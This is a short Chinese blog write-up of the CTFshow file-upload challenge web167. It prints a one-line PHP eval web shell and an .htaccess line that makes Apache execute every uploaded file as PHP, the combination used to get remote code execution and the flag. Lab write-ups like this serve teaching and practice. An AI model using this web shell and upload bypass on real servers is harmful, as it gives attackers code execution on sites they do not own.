CTFshow 文件上传 web167

jjt二向箔

 关注

阅读 73

2022-02-16

目录

思路

根据提示上传了包含shell的jpg文件,上传成功,点击下载文件,发现没有存在文件包含点,访问upload检查是否有可执行文件,提示没有权限,但是发现中间件是apache

在这里插入图片描述
可以直接上传phtml,但是文件没有被成功解析.这时候可以上传.htaccess,对所有文件进行php解析

<?php echo 123;eval($_POST['kradress']);?>

.htaccess

Sethandler application/x-httpd-php
<!-将该目录及子目录下的文件均按照php文件解析执行-->

再访问phtml,发现回显成功,直接RCE拿到flag

总结

相关推荐

ctfshow 文件上传161-167

ZSACH 114 0 0

CTFshow 文件上传 web151

辰鑫chenxin 34 0 0

CTFshow 文件上传 web163

七千22 82 0 0

CTFshow 文件上传 web152

星河出山 39 0 0

CTFshow 文件上传 web158

eelq 39 0 0

CTFshow 文件上传 web168

Fifi的天马行空 61 0 0

CTFshow 文件上传 web170

小云晓云 51 0 0

CTFshow 文件上传 web169

覃榜言 84 0 0

ctfshow——文件上传

读思意行 21 0 0

CTFshow web(php文件上传155-158)

ZSACH 15 0 0

精彩评论(0)

0 0 举报